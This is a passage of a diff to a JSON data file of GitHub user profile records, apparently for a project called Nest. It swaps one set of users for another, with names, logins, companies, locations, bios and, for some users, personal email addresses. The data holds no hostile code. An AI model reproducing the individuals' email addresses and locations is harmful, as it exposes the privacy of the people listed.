"https://avatars.githubusercontent.com/u/111932850?v=4", + "nest_created_at": "2024-09-22T09:46:14.630Z", + "nest_updated_at": "2024-09-22T19:45:18.193Z", + "name": "Robert", + "login": "rprzystasz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4115033?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2022-08-24T00:09:17Z", - "updated_at": "2024-09-12T03:51:13Z", - "node_id": "U_kgDOBqv1sg", + "public_repositories_count": 7, + "created_at": "2013-04-10T12:34:04Z", + "updated_at": "2024-09-04T08:49:23Z", + "node_id": "MDQ6VXNlcjQxMTUwMzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432503,124 +692427,124 @@ }, { "model": "github.user", - "pk": 2891, + "pk": 8261, "fields": { - "nest_created_at": "2024-09-12T02:31:21.026Z", - "nest_updated_at": "2024-09-12T02:31:23.527Z", - "name": "BD", - "login": "flabbergastedbd", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2751016?v=4", - "company": "@confluentinc ", - "location": "Bangalore, India", + "nest_created_at": "2024-09-22T09:46:14.950Z", + "nest_updated_at": "2024-09-22T19:45:18.502Z", + "name": "sumanth damarla", + "login": "sims143", + "email": "damarla.sumanth@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7584210?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 46, - "followers_count": 197, - "public_gists_count": 4, - "public_repositories_count": 29, - "created_at": "2012-11-08T13:38:55Z", - "updated_at": "2024-08-28T18:30:53Z", - "node_id": "MDQ6VXNlcjI3NTEwMTY=", + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2014-05-14T17:58:59Z", + "updated_at": "2019-11-12T01:39:35Z", + "node_id": "MDQ6VXNlcjc1ODQyMTA=", "bio": "", - "is_hireable": false, - "twitter_username": "flabbergastedbd" + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2892, + "pk": 8262, "fields": { - "nest_created_at": "2024-09-12T02:31:28.011Z", - "nest_updated_at": "2024-09-12T02:31:28.011Z", - "name": "Nick Heinbaugh", - "login": "nheinbaugh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2780977?v=4", - "company": "ClickUp", - "location": "Seattle", + "nest_created_at": "2024-09-22T09:46:15.268Z", + "nest_updated_at": "2024-09-22T19:45:18.812Z", + "name": "Bartosz Wyględacz", + "login": "wylly", + "email": "wylly31@wp.pl", + "avatar_url": "https://avatars.githubusercontent.com/u/7705650?v=4", + "company": "", + "location": "Cracow", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 26, - "created_at": "2012-11-12T19:39:52Z", - "updated_at": "2024-09-06T20:31:48Z", - "node_id": "MDQ6VXNlcjI3ODA5Nzc=", - "bio": "", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-05-26T20:19:53Z", + "updated_at": "2023-10-21T22:58:40Z", + "node_id": "MDQ6VXNlcjc3MDU2NTA=", + "bio": "Fresh IT graduate.\r\nMastering java in progress.\r\nNext goal: full stack.\r\nLiving with 2 crazy, cage-free rabbits.\r\nBoard games player in free time:)", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2893, + "pk": 8263, "fields": { - "nest_created_at": "2024-09-12T02:31:28.838Z", - "nest_updated_at": "2024-09-18T19:11:16.815Z", - "name": "", - "login": "ojasp", + "nest_created_at": "2024-09-22T09:46:16.237Z", + "nest_updated_at": "2024-09-22T19:45:19.765Z", + "name": "Ole Christian Langfjæran", + "login": "judoole", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15022394?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55565?v=4", + "company": "@unacast", + "location": "Oslo, Norway", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-10-07T21:57:51Z", - "updated_at": "2024-08-23T13:10:54Z", - "node_id": "MDQ6VXNlcjE1MDIyMzk0", - "bio": "", + "following_count": 144, + "followers_count": 61, + "public_gists_count": 25, + "public_repositories_count": 62, + "created_at": "2009-02-18T14:28:50Z", + "updated_at": "2024-09-14T10:26:01Z", + "node_id": "MDQ6VXNlcjU1NTY1", + "bio": "Senior engineer @unacast", "is_hireable": false, - "twitter_username": "" + "twitter_username": "judoole" } }, { "model": "github.user", - "pk": 2894, + "pk": 8264, "fields": { - "nest_created_at": "2024-09-12T02:32:02.003Z", - "nest_updated_at": "2024-09-18T19:12:00.910Z", - "name": "Enterprise Security API", - "login": "ESAPI", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5580725?v=4", + "nest_created_at": "2024-09-22T09:46:16.556Z", + "nest_updated_at": "2024-09-22T19:45:20.877Z", + "name": "Robert Morgan", + "login": "rtmorgan", + "email": "robert.thomas.morgan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7585796?v=4", "company": "", - "location": "", + "location": "United States", "collaborators_count": 0, - "following_count": 0, - "followers_count": 27, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-09-30T22:47:32Z", - "updated_at": "2016-02-27T11:27:02Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjU1ODA3MjU=", + "following_count": 5, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2014-05-14T21:11:33Z", + "updated_at": "2024-09-11T16:27:36Z", + "node_id": "MDQ6VXNlcjc1ODU3OTY=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Robert_T_Morgan" } }, { "model": "github.user", - "pk": 2895, + "pk": 8265, "fields": { - "nest_created_at": "2024-09-12T02:32:05.085Z", - "nest_updated_at": "2024-09-12T02:32:05.085Z", - "name": "b-long", - "login": "b-long", + "nest_created_at": "2024-09-22T09:46:17.202Z", + "nest_updated_at": "2024-09-22T19:45:21.508Z", + "name": "Espen Fossen", + "login": "espenaf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66993?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/818154?v=4", + "company": "Kantega AS", "location": "", "collaborators_count": 0, - "following_count": 241, - "followers_count": 42, - "public_gists_count": 9, - "public_repositories_count": 30, - "created_at": "2009-03-25T13:12:23Z", - "updated_at": "2024-08-23T18:51:15Z", - "node_id": "MDQ6VXNlcjY2OTkz", + "following_count": 0, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2011-05-30T07:22:37Z", + "updated_at": "2024-09-19T01:38:32Z", + "node_id": "MDQ6VXNlcjgxODE1NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432628,24 +692552,24 @@ }, { "model": "github.user", - "pk": 2896, + "pk": 8266, "fields": { - "nest_created_at": "2024-09-12T02:32:05.878Z", - "nest_updated_at": "2024-09-12T02:32:05.878Z", + "nest_created_at": "2024-09-22T09:46:17.509Z", + "nest_updated_at": "2024-09-22T19:45:21.838Z", "name": "", - "login": "stefanuzz86", + "login": "rtaban", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87862170?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/399892?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-07-23T12:40:22Z", - "updated_at": "2021-07-23T12:40:22Z", - "node_id": "MDQ6VXNlcjg3ODYyMTcw", + "public_repositories_count": 2, + "created_at": "2010-09-15T07:20:37Z", + "updated_at": "2024-06-29T08:56:17Z", + "node_id": "MDQ6VXNlcjM5OTg5Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432653,49 +692577,49 @@ }, { "model": "github.user", - "pk": 2897, + "pk": 8267, "fields": { - "nest_created_at": "2024-09-12T02:32:07.554Z", - "nest_updated_at": "2024-09-18T19:11:50.203Z", - "name": "Bharath Mannaperumal", - "login": "bharathmit", - "email": "bharathkumar.feb14@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6636257?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:47:38.788Z", + "nest_updated_at": "2024-09-22T19:46:41.755Z", + "name": "Johan Lindfors", + "login": "johanlindfors-ts", + "email": "johan.lindfors@truesec.se", + "avatar_url": "https://avatars.githubusercontent.com/u/135124992?v=4", + "company": "@Truesec", + "location": "Stockholm", "collaborators_count": 0, - "following_count": 5, - "followers_count": 4, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-02-10T06:38:05Z", - "updated_at": "2024-09-11T11:54:41Z", - "node_id": "MDQ6VXNlcjY2MzYyNTc=", - "bio": "", + "public_repositories_count": 0, + "created_at": "2023-05-31T11:32:46Z", + "updated_at": "2024-09-02T19:37:45Z", + "node_id": "U_kgDOCA3YAA", + "bio": "Domain Lead Secure Development", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2898, + "pk": 8268, "fields": { - "nest_created_at": "2024-09-12T02:32:13.757Z", - "nest_updated_at": "2024-09-12T02:35:14.244Z", - "name": "Max Gelman", - "login": "meg23", + "nest_created_at": "2024-09-22T09:47:40.777Z", + "nest_updated_at": "2024-09-22T19:46:43.654Z", + "name": "Aaron Ott", + "login": "aaronott", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/814859?v=4", - "company": "@tackle-io ", - "location": "Plano, TX", + "avatar_url": "https://avatars.githubusercontent.com/u/332553?v=4", + "company": "Rule4", + "location": "Thornton, CO", "collaborators_count": 0, - "following_count": 57, - "followers_count": 19, - "public_gists_count": 10, - "public_repositories_count": 100, - "created_at": "2011-05-27T19:15:48Z", - "updated_at": "2024-08-13T23:34:34Z", - "node_id": "MDQ6VXNlcjgxNDg1OQ==", + "following_count": 7, + "followers_count": 13, + "public_gists_count": 20, + "public_repositories_count": 59, + "created_at": "2010-07-15T01:43:01Z", + "updated_at": "2024-08-30T22:17:15Z", + "node_id": "MDQ6VXNlcjMzMjU1Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432703,99 +692627,99 @@ }, { "model": "github.user", - "pk": 2899, + "pk": 8269, "fields": { - "nest_created_at": "2024-09-12T02:33:08.874Z", - "nest_updated_at": "2024-09-12T02:35:49.426Z", - "name": "Matt Seil", - "login": "xeno6696", + "nest_created_at": "2024-09-22T09:47:41.426Z", + "nest_updated_at": "2024-09-22T19:46:44.289Z", + "name": "Christian Hemminghaus", + "login": "chemmi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9502785?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15739060?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 11, - "public_gists_count": 2, - "public_repositories_count": 77, - "created_at": "2014-11-01T19:31:53Z", - "updated_at": "2024-08-18T17:16:01Z", - "node_id": "MDQ6VXNlcjk1MDI3ODU=", - "bio": "I'm a security professional in AppSec. I'm the Project Co-Lead on ESAPI-Java-Legacy along with @kwwall ", + "following_count": 12, + "followers_count": 7, + "public_gists_count": 3, + "public_repositories_count": 5, + "created_at": "2015-11-09T18:15:46Z", + "updated_at": "2024-08-27T09:37:54Z", + "node_id": "MDQ6VXNlcjE1NzM5MDYw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2900, + "pk": 8270, "fields": { - "nest_created_at": "2024-09-12T02:33:09.255Z", - "nest_updated_at": "2024-09-12T02:35:53.562Z", - "name": "", - "login": "jeremiahjstacey", + "nest_created_at": "2024-09-22T09:47:41.768Z", + "nest_updated_at": "2024-09-22T19:46:44.620Z", + "name": "Connick Shields", + "login": "connickshields", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16555944?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5580660?v=4", "company": "", - "location": "", + "location": "Bay Area, California", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 8, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-01-05T09:40:11Z", - "updated_at": "2023-08-18T18:24:29Z", - "node_id": "MDQ6VXNlcjE2NTU1OTQ0", - "bio": "", + "public_repositories_count": 15, + "created_at": "2013-09-30T22:36:37Z", + "updated_at": "2024-09-03T15:55:48Z", + "node_id": "MDQ6VXNlcjU1ODA2NjA=", + "bio": "Security Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2901, + "pk": 8271, "fields": { - "nest_created_at": "2024-09-12T02:35:17.087Z", - "nest_updated_at": "2024-09-12T02:35:17.087Z", - "name": "Paweł Krawczyk", - "login": "kravietz", + "nest_created_at": "2024-09-22T09:47:42.082Z", + "nest_updated_at": "2024-09-22T19:46:44.938Z", + "name": "Enno Schnackenberg", + "login": "Intubun", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/616047?v=4", - "company": "Krawczyk Industries Limited", - "location": "Reading, UK", + "avatar_url": "https://avatars.githubusercontent.com/u/41478036?v=4", + "company": "", + "location": "Lower Saxony, Germany", "collaborators_count": 0, - "following_count": 24, - "followers_count": 85, - "public_gists_count": 14, - "public_repositories_count": 63, - "created_at": "2011-02-13T18:51:29Z", - "updated_at": "2024-07-11T14:03:49Z", - "node_id": "MDQ6VXNlcjYxNjA0Nw==", - "bio": "Information security, DevOps and DevSecOps professional from Poland living in the UK", - "is_hireable": true, + "following_count": 11, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-07-20T13:01:03Z", + "updated_at": "2024-09-20T18:35:41Z", + "node_id": "MDQ6VXNlcjQxNDc4MDM2", + "bio": "Your personal electronics tech :-) (\"Elektroniker für Geräte und Systeme\")", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2902, + "pk": 8272, "fields": { - "nest_created_at": "2024-09-12T02:35:21.293Z", - "nest_updated_at": "2024-09-12T02:35:21.293Z", - "name": "", - "login": "aaditriray", + "nest_created_at": "2024-09-22T09:47:42.720Z", + "nest_updated_at": "2024-09-22T19:46:45.564Z", + "name": "Max Winkler", + "login": "maxwinkler07", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16678049?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32416124?v=4", + "company": "Hochschule Luzern", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2016-01-13T03:23:43Z", - "updated_at": "2024-09-02T18:46:57Z", - "node_id": "MDQ6VXNlcjE2Njc4MDQ5", + "public_repositories_count": 8, + "created_at": "2017-09-30T14:30:37Z", + "updated_at": "2024-08-02T12:50:58Z", + "node_id": "MDQ6VXNlcjMyNDE2MTI0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432803,49 +692727,49 @@ }, { "model": "github.user", - "pk": 2903, + "pk": 8273, "fields": { - "nest_created_at": "2024-09-12T02:35:22.519Z", - "nest_updated_at": "2024-09-12T02:35:45.007Z", - "name": "Jacky", - "login": "jackycct", - "email": "jackycct@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/11598320?v=4", - "company": "J.P. Morgan Chase", - "location": "Hong Kong", + "nest_created_at": "2024-09-22T10:34:24.079Z", + "nest_updated_at": "2024-09-22T19:47:48.259Z", + "name": "Stephen Morgan", + "login": "doublethink", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5619850?v=4", + "company": "", + "location": "New Zealand", "collaborators_count": 0, "following_count": 1, - "followers_count": 8, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2015-03-22T14:31:03Z", - "updated_at": "2024-08-14T11:25:20Z", - "node_id": "MDQ6VXNlcjExNTk4MzIw", - "bio": "Interested in machine learning and security", + "public_repositories_count": 18, + "created_at": "2013-10-05T21:56:19Z", + "updated_at": "2024-05-27T21:41:08Z", + "node_id": "MDQ6VXNlcjU2MTk4NTA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2904, + "pk": 8274, "fields": { - "nest_created_at": "2024-09-12T02:35:39.616Z", - "nest_updated_at": "2024-09-12T02:35:39.616Z", + "nest_created_at": "2024-09-22T10:34:24.703Z", + "nest_updated_at": "2024-09-22T19:47:48.896Z", "name": "", - "login": "jtconsol", + "login": "amithmurthy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50707283?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29315751?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 3, - "created_at": "2019-05-16T13:46:25Z", - "updated_at": "2023-12-08T10:21:54Z", - "node_id": "MDQ6VXNlcjUwNzA3Mjgz", + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-06-09T22:29:59Z", + "updated_at": "2024-07-29T19:34:10Z", + "node_id": "MDQ6VXNlcjI5MzE1NzUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432853,149 +692777,149 @@ }, { "model": "github.user", - "pk": 2905, + "pk": 8275, "fields": { - "nest_created_at": "2024-09-12T02:35:41.723Z", - "nest_updated_at": "2024-09-12T02:35:42.128Z", - "name": "Simon Sobisch", - "login": "GitMensch", - "email": "simonsobisch@web.de", - "avatar_url": "https://avatars.githubusercontent.com/u/6699539?v=4", - "company": "", - "location": "Germany", + "nest_created_at": "2024-09-22T10:34:25.014Z", + "nest_updated_at": "2024-09-22T19:47:49.209Z", + "name": "Eduard Tamsa", + "login": "TaEduard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19353972?v=4", + "company": "@sjultra ", + "location": "A remote village somewhere in Romania", "collaborators_count": 0, - "following_count": 0, - "followers_count": 50, - "public_gists_count": 2, - "public_repositories_count": 87, - "created_at": "2014-02-16T23:12:27Z", - "updated_at": "2024-08-28T11:29:55Z", - "node_id": "MDQ6VXNlcjY2OTk1Mzk=", - "bio": "at day being either at work or with my kids, hacking free software, especially GnuCOBOL - https://www.gnu.org/software/gnucobol", - "is_hireable": false, + "following_count": 58, + "followers_count": 25, + "public_gists_count": 6, + "public_repositories_count": 38, + "created_at": "2016-05-13T22:27:35Z", + "updated_at": "2024-03-20T11:24:05Z", + "node_id": "MDQ6VXNlcjE5MzUzOTcy", + "bio": "Hello.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2906, + "pk": 8276, "fields": { - "nest_created_at": "2024-09-12T02:35:46.211Z", - "nest_updated_at": "2024-09-12T02:35:46.211Z", + "nest_created_at": "2024-09-22T10:34:49.240Z", + "nest_updated_at": "2024-09-22T19:48:27.266Z", "name": "", - "login": "hbroeder", + "login": "TimDiam0nd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28145756?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/54599998?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-04-28T12:11:39Z", - "updated_at": "2023-02-14T12:31:14Z", - "node_id": "MDQ6VXNlcjI4MTQ1NzU2", + "public_repositories_count": 6, + "created_at": "2019-08-27T19:30:49Z", + "updated_at": "2024-09-18T00:06:19Z", + "node_id": "MDQ6VXNlcjU0NTk5OTk4", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2907, + "pk": 8277, "fields": { - "nest_created_at": "2024-09-12T02:35:48.238Z", - "nest_updated_at": "2024-09-12T02:35:48.238Z", - "name": "Aaron Tagliaboschi", - "login": "amtunlimited", - "email": "aaron.tagliaboschi@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1744426?v=4", + "nest_created_at": "2024-09-22T10:34:54.313Z", + "nest_updated_at": "2024-09-22T19:48:18.509Z", + "name": "Christoph Hansen", + "login": "emphazer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4424570?v=4", "company": "", - "location": "", + "location": "NRW, Germany", "collaborators_count": 0, - "following_count": 15, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2012-05-16T04:30:40Z", - "updated_at": "2024-08-12T02:26:24Z", - "node_id": "MDQ6VXNlcjE3NDQ0MjY=", - "bio": "", + "following_count": 10, + "followers_count": 16, + "public_gists_count": 7, + "public_repositories_count": 18, + "created_at": "2013-05-14T05:46:29Z", + "updated_at": "2023-11-06T01:18:18Z", + "node_id": "MDQ6VXNlcjQ0MjQ1NzA=", + "bio": "Security Geek / Webadmin", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2908, + "pk": 8278, "fields": { - "nest_created_at": "2024-09-12T02:35:58.101Z", - "nest_updated_at": "2024-09-12T02:35:58.101Z", - "name": "", - "login": "wangyun2018", + "nest_created_at": "2024-09-22T10:34:54.629Z", + "nest_updated_at": "2024-09-22T19:48:18.820Z", + "name": "Manuel Spartan", + "login": "spartantri", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39397318?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12847733?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2018-05-18T05:18:36Z", - "updated_at": "2024-02-22T08:51:19Z", - "node_id": "MDQ6VXNlcjM5Mzk3MzE4", - "bio": "", + "following_count": 3, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 88, + "created_at": "2015-06-11T15:30:19Z", + "updated_at": "2024-09-07T03:23:13Z", + "node_id": "MDQ6VXNlcjEyODQ3NzMz", + "bio": "I like doing cool CyberSecurity stuff, especially working with WAFs and log parsing for intrusion detection. I'm OWASP CRS developer on my spare time.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2909, + "pk": 8279, "fields": { - "nest_created_at": "2024-09-12T02:36:01.389Z", - "nest_updated_at": "2024-09-12T02:36:01.389Z", - "name": "Zac Spitzer", - "login": "zspitzer", + "nest_created_at": "2024-09-22T10:34:55.252Z", + "nest_updated_at": "2024-09-22T19:48:19.450Z", + "name": "", + "login": "terjanq", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/426404?v=4", - "company": "Pixl8", - "location": "Berlin, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/11320896?v=4", + "company": "@google ", + "location": "Poland", "collaborators_count": 0, - "following_count": 54, - "followers_count": 36, - "public_gists_count": 7, - "public_repositories_count": 83, - "created_at": "2010-10-04T12:39:28Z", - "updated_at": "2024-08-20T11:20:48Z", - "node_id": "MDQ6VXNlcjQyNjQwNA==", - "bio": "Community Manager @lucee ", + "following_count": 10, + "followers_count": 820, + "public_gists_count": 29, + "public_repositories_count": 40, + "created_at": "2015-03-04T20:54:28Z", + "updated_at": "2024-09-20T11:34:39Z", + "node_id": "MDQ6VXNlcjExMzIwODk2", + "bio": "Information Security Engineer @ Google", "is_hireable": false, - "twitter_username": "zackster" + "twitter_username": "terjanq" } }, { "model": "github.user", - "pk": 2910, + "pk": 8280, "fields": { - "nest_created_at": "2024-09-12T02:36:03.911Z", - "nest_updated_at": "2024-09-12T02:36:03.911Z", - "name": "Aakash Pawar", - "login": "Aakash4396", + "nest_created_at": "2024-09-22T10:34:55.888Z", + "nest_updated_at": "2024-09-22T19:49:05.646Z", + "name": "Karel", + "login": "karelorigin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87015441?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20503272?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-07-06T11:02:14Z", - "updated_at": "2024-09-04T15:14:21Z", - "node_id": "MDQ6VXNlcjg3MDE1NDQx", + "followers_count": 28, + "public_gists_count": 7, + "public_repositories_count": 24, + "created_at": "2016-07-17T15:51:15Z", + "updated_at": "2024-08-30T19:11:20Z", + "node_id": "MDQ6VXNlcjIwNTAzMjcy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433003,99 +692927,99 @@ }, { "model": "github.user", - "pk": 2911, + "pk": 8281, "fields": { - "nest_created_at": "2024-09-12T02:36:04.737Z", - "nest_updated_at": "2024-09-12T02:36:04.737Z", - "name": "Jerry Devis", - "login": "JerryDevis", + "nest_created_at": "2024-09-22T10:34:57.179Z", + "nest_updated_at": "2024-09-22T19:48:21.448Z", + "name": "Matt Bagley", + "login": "bagley", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89641128?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1245278?v=4", "company": "", - "location": "Earth", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 1, + "following_count": 3, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2021-08-27T11:27:01Z", - "updated_at": "2024-07-23T15:24:32Z", - "node_id": "MDQ6VXNlcjg5NjQxMTI4", - "bio": "Trusted Computing\r\nCryptography", + "public_repositories_count": 12, + "created_at": "2011-12-06T18:47:57Z", + "updated_at": "2023-06-20T17:56:32Z", + "node_id": "MDQ6VXNlcjEyNDUyNzg=", + "bio": "I love to learn, explore, write code and stories, hike, take photos, read, build, and help others do the same.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2912, + "pk": 8282, "fields": { - "nest_created_at": "2024-09-12T02:36:12.196Z", - "nest_updated_at": "2024-09-12T02:36:12.196Z", - "name": "David M. Karr", - "login": "davidmichaelkarr", + "nest_created_at": "2024-09-22T10:34:57.817Z", + "nest_updated_at": "2024-09-22T19:48:22.078Z", + "name": "Paul Beckett", + "login": "53cur3M3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5566419?v=4", - "company": "AT&T", - "location": "Redmond, WA", + "avatar_url": "https://avatars.githubusercontent.com/u/16582726?v=4", + "company": "", + "location": "Norwich, UK", "collaborators_count": 0, "following_count": 1, - "followers_count": 3, - "public_gists_count": 2, - "public_repositories_count": 30, - "created_at": "2013-09-28T21:48:40Z", - "updated_at": "2024-08-28T23:58:44Z", - "node_id": "MDQ6VXNlcjU1NjY0MTk=", - "bio": "", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 129, + "created_at": "2016-01-06T21:06:41Z", + "updated_at": "2024-09-17T08:04:05Z", + "node_id": "MDQ6VXNlcjE2NTgyNzI2", + "bio": "Paul Beckett is Lead Application Security Specialist with the University of East Anglia. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2913, + "pk": 8283, "fields": { - "nest_created_at": "2024-09-12T02:36:13.464Z", - "nest_updated_at": "2024-09-12T02:36:13.464Z", - "name": "Björn Müller", - "login": "nettermensch", + "nest_created_at": "2024-09-22T10:34:58.142Z", + "nest_updated_at": "2024-09-22T19:48:22.391Z", + "name": "floyd", + "login": "floyd-fuh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8876996?v=4", - "company": "CaptainCasa GmbH", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1428689?v=4", + "company": "Pentagrid AG", + "location": "Buchs SG, Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-09-23T13:56:01Z", - "updated_at": "2022-10-13T05:01:30Z", - "node_id": "MDQ6VXNlcjg4NzY5OTY=", - "bio": "", + "following_count": 11, + "followers_count": 158, + "public_gists_count": 2, + "public_repositories_count": 52, + "created_at": "2012-02-11T10:49:02Z", + "updated_at": "2024-09-04T17:49:57Z", + "node_id": "MDQ6VXNlcjE0Mjg2ODk=", + "bio": "https://www.pentagrid.ch/\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2914, + "pk": 8284, "fields": { - "nest_created_at": "2024-09-12T02:36:17.132Z", - "nest_updated_at": "2024-09-12T02:36:17.132Z", - "name": "", - "login": "SalmanMohammedTR", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85247740?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:34:58.778Z", + "nest_updated_at": "2024-09-22T19:48:23.028Z", + "name": "Allan Boll", + "login": "allanrbo", + "email": "allan@acoby.com", + "avatar_url": "https://avatars.githubusercontent.com/u/240223?v=4", + "company": "Google", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-06-02T16:40:36Z", - "updated_at": "2024-09-04T05:14:10Z", - "node_id": "MDQ6VXNlcjg1MjQ3NzQw", + "following_count": 10, + "followers_count": 24, + "public_gists_count": 3, + "public_repositories_count": 21, + "created_at": "2010-04-09T11:28:54Z", + "updated_at": "2024-08-17T06:19:38Z", + "node_id": "MDQ6VXNlcjI0MDIyMw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433103,199 +693027,199 @@ }, { "model": "github.user", - "pk": 2915, + "pk": 8285, "fields": { - "nest_created_at": "2024-09-12T02:36:30.564Z", - "nest_updated_at": "2024-09-12T02:36:30.564Z", - "name": "Rodolfo Ferreira", - "login": "RodolfoAndre", + "nest_created_at": "2024-09-22T10:34:59.085Z", + "nest_updated_at": "2024-09-22T19:48:23.374Z", + "name": "rekter0", + "login": "rekter0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6514867?v=4", + "avatar_url": 